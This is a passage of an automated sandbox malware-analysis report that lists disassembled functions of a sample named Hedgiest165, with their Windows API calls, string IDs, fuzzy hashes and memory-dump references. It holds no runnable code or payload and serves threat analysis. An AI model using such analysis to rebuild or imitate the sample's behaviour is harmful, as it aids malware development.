                                                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                        • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf
                                                                        • String ID: %%-%d.%ds
                                                                        • API String ID: 3988819677-2008345750
                                                                        • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                        • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                        APIs
                                                                        • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                        • memset.MSVCRT ref: 00401917
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PlacementWindowmemset
                                                                        • String ID: WinPos
                                                                        • API String ID: 4036792311-2823255486
                                                                        • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                        • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                        APIs
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                                                        • wcscat.MSVCRT ref: 0040DCFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                        • String ID: _lng.ini
                                                                        • API String ID: 383090722-1948609170
                                                                        • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                        • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                        • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                        • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                        • API String ID: 2773794195-880857682
                                                                        • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                        • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                        • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID: MZ@
                                                                        • API String ID: 1378638983-2978689999
                                                                        • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                        • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                        • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                        • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                        APIs
                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                        • memset.MSVCRT ref: 0042BAAE
                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID:
                                                                        • API String ID: 438689982-0
                                                                        • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                        • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                        APIs
                                                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                        • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                        • free.MSVCRT ref: 0040A908
                                                                        • free.MSVCRT ref: 0040A92B
                                                                        • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 726966127-0
                                                                        • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                        • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                        • free.MSVCRT ref: 0040B201
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                        • free.MSVCRT ref: 0040B224
                                                                        • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 726966127-0
                                                                        • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                        • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                        APIs
                                                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp$memcpy
                                                                        • String ID:
                                                                        • API String ID: 231171946-0
                                                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                        APIs
                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                        • free.MSVCRT ref: 0040B0FB
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                        • free.MSVCRT ref: 0040B12C
                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$memcpy$mallocstrlen
                                                                        • String ID:
                                                                        • API String ID: 3669619086-0
                                                                        • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                        • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                        • malloc.MSVCRT ref: 00417407
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                        • free.MSVCRT ref: 00417425
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                        • String ID:
                                                                        • API String ID: 2605342592-0
                                                                        • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                        • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5